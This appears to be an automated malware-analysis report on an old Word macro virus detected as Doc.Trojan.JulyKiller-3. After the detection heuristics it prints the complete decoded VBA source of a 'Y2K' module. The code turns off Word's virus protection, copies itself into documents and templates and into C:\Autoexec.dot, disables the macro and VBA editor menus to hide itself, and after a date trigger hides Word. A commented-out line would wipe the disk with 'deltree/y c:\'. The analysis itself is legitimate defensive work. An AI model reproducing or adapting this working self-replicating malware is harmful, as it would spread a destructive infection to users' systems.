MALICIOUS
196
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing VBA macros, including AutoOpen and AutoClose, which are commonly used for malicious purposes. The 'Y2K' module attempts to disable virus protection and manipulate macro settings, likely to facilitate the execution of a secondary payload from a file named 'Autoexec.dot' located in the startup path.
Heuristics 6
-
ClamAV: Doc.Trojan.JulyKiller-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.JulyKiller-3
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7193 bytes |
SHA-256: 1e74216c39538ad1e72b589190743436db4ca367a20df396eb35d8ed5cf4edd3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Y2K"
Sub actNo()
For Each myTask In Tasks
If InStr(myTask.Name, "Visual Basic") > 0 Then
myTask.Visible = False
End If
Next myTask
End Sub
Sub Autos()
Dim file$
Dim ans$
Dim test
Dim mItem
Dim cItem
Dim aDoc
Dim aTemp
Dim vset
Dim Iset
Dim ad
Dim y2kDate As Long
Application.ScreenUpdating = False
For Each ad In AddIns
If ad.Name = "Autoexec.dot" Then
ad.Installed = False
End If
Next ad
With Dialogs(wdDialogToolsOptionsFileLocations)
.path = "STARTUP-PATH"
.Setting = "c:\"
.Execute
End With
If Options.VirusProtection Then
Options.VirusProtection = False
End If
file$ = WordBasic.[MacroFileName$]()
If InStr(file$, "Autoexec") <> 0 Then
For Each aDoc In Documents
For Each cItem In aDoc.VBProject.VBComponents
If (cItem.Name = "Y2K") Then
vset = 1
End If
Next cItem
Next aDoc
For Each cItem In NormalTemplate.VBProject.VBComponents
If (cItem.Name = "Y2K") Then
vset = 1
End If
Next cItem
If vset <> 1 Then
'WordBasic.DisableAutoMacros
Documents.Open FileName:="C:\Autoexec.dot", AddToRecentFiles:=False
For Each aDoc In Documents
If (InStr(aDoc.FullName, Application.PathSeparator) <> 0) And (aDoc.VBProject.Protection = 0) Then
WordBasic.MacroCopy ActiveDocument.FullName + ":Y2K", aDoc.FullName + ":Y2K"
End If
Next aDoc
For Each aTemp In Templates
If (InStr(aTemp.FullName, Application.PathSeparator) <> 0) And (aTemp.VBProject.Protection = 0) Then
WordBasic.MacroCopy ActiveDocument.FullName + ":Y2K", aTemp.FullName + ":Y2K"
End If
Next aTemp
ActiveDocument.Save
ActiveDocument.Close
End If
If vset = 1 Then
GoTo out
End If
End If
With Application.FileSearch
.LookIn = "C:\"
.FileName = "Autoexec.dot"
If .Execute > 0 Then
Iset = 1
End If
End With
If Iset <> 1 Then
'WordBasic.DisableAutoMacros
Documents.Add NewTemplate:=True
WordBasic.MacroCopy file$ + ":Y2K", ActiveDocument.FullName + ":Y2K"
ActiveDocument.SaveAs FileName:="c:\Autoexec.dot", AddToRecentFiles:=False
ActiveDocument.Close
End If
For Each aDoc In Documents
If (file$ <> aDoc.FullName) And (aDoc.VBProject.Protection = 0) Then
For Each cItem In aDoc.VBProject.VBComponents
If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then
aDoc.VBProject.VBComponents.Remove (cItem)
End If
Next cItem
End If
Next aDoc
For Each aTemp In Templates
If (file$ <> aTemp.FullName) And (aTemp.VBProject.Protection = 0) Then
For Each cItem In aTemp.VBProject.VBComponents
If (cItem.Name = "AutoOpen") Or (cItem.Name = "AutoNew") Or (cItem.Name = "AutoClose") Or (cItem.Name = "FileSave") Then
aTemp.VBProject.VBComponents.Remove (cItem)
End If
Next cItem
End If
Next aTemp
For Each aDoc In Documents
If (InStr(aDoc.FullName, Application.PathSeparator) <> 0) And (aDoc.VBProject.Protection = 0) Then
WordBasic.MacroCopy file$ + ":Y2K", aDoc.FullName + ":Y2K"
End If
Next aDoc
For Each aTemp In Templates
If (InStr(aTemp.FullName, Application.PathSeparator) <> 0) And (aTemp.VBProject.Protection = 0) Then
WordBasic.MacroCopy file$ + ":Y2K", aTemp.FullName + ":Y2K"
End If
Next aTemp
out:
CustomizationContext = NormalTemplate
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="FileSaveAs"
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="FileSaveAs"
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF1))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ToolsMacro"
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyF2))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="ViewVBCode"
Set myKey = FindKey(BuildKeyCode(wdKeyAlt, wdKeyZ))
myKey.Rebind KeyCategory:=wdKeyCategoryCommand, Command:="backy2k"
For Each mItem In CommandBars("Tools").Controls
If mItem.Caption = "×Ô¶¨Òå(&C)..." Then
mItem.OnAction = "actno"
End If
If mItem.Caption = "Ä£°åºÍ¼ÓÔØÏî(&I)..." Then
mItem.OnAction = "actno"
End If
If mItem.Caption = "Ñ¡Ïî(&O)..." Then
mItem.OnAction = "actno"
End If
Next mItem
For Each cItem In CommandBars("Tools").Controls
If cItem.Type = msoControlPopup Then
If cItem.Caption = "ºê(&M)" Then
For Each mItem In cItem.CommandBar.Controls
If mItem.Caption = "ºê(&M)..." Then
mItem.OnAction = "actno"
End If
If mItem.Caption = "Visual Basic ±à¼Æ÷(&V)" Then
mItem.OnAction = "actno"
End If
Next mItem
End If
End If
Next cItem
For Each cItem In CommandBars("Visual Basic").Controls
cItem.OnAction = "actno"
Next cItem
For Each cItem In CommandBars
If cItem.Visible = True Then
cItem.Protection = msoBarNoCustomize
End If
Next cItem
For Each myTask In Tasks
If InStr(myTask.Name, "Visual Basic") > 0 Then
myTask.Visible = False
End If
Next myTask
Application.ScreenUpdating = True
On Error GoTo Pun
WordBasic.FileSaveAll 1, 1
Pun:
y2kDate = Int(Now())
On Error GoTo -1
On Error GoTo -1
If y2kDate >= 36526 Then
If y2kDate = 36526 Or (Rnd() * 100000 Mod 10) = 2 Then
'Open "C:\autoexec.bat" For Output As 1
'Print #1, "deltree/y c:\"
'Close 1
For Each myTask In Tasks
If InStr(myTask.Name, "Word") > 0 Then
myTask.Visible = False
End If
Next myTask
End If
End If
End Sub
Sub AutoOpen()
Autos
End Sub
Sub autoclose()
Autos
End Sub
Sub autoNew()
Autos
End Sub
Sub autoexec()
Autos
End Sub
Sub backY2k()
For Each myTask In Tasks
If InStr(myTask.Name, "Word") > 0 Then
myTask.Visible = True
End If
Next myTask
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.